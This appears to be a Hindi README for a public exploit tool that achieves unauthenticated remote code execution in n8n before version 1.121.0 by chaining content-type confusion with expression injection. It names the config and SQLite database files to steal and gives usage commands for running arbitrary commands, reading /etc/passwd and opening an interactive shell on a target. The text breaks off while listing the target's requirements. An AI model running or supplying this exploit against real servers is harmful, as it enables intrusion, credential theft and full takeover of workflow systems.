
n8n में बिना प्रमाणीकरण के रिमोट कोड निष्पादन के लिए एक्सप्लॉइट श्रृंखला, जो content-type भ्रम और एक्सप्रेशन इंजेक्शन को मिलाकर फ़ाइलें पढ़ने, JWT बनाने और कमांड निष्पादित करने में सक्षम बनाती है।
n8n < 1.121.0 के लिए बिना प्रमाणीकरण वाली RCE श्रृंखला (CVSS 10.0)
/home/node/.n8n/config और database.sqlite पढ़ेंchild_process के माध्यम से कमांड निष्पादित करें# कमांड निष्पादित करें
python3 exploit.py http://target:5678 /form/test --cmd "id"
# फ़ाइल पढ़ें
python3 exploit.py http://target:5678 /form/test --read /etc/passwd
# इंटरैक्टिव शेल
python3 exploit.py http://target:5678 /form/test
लक्ष्य में एक सक्रिय वर्कफ़्लो होना चाहिए जिसमें: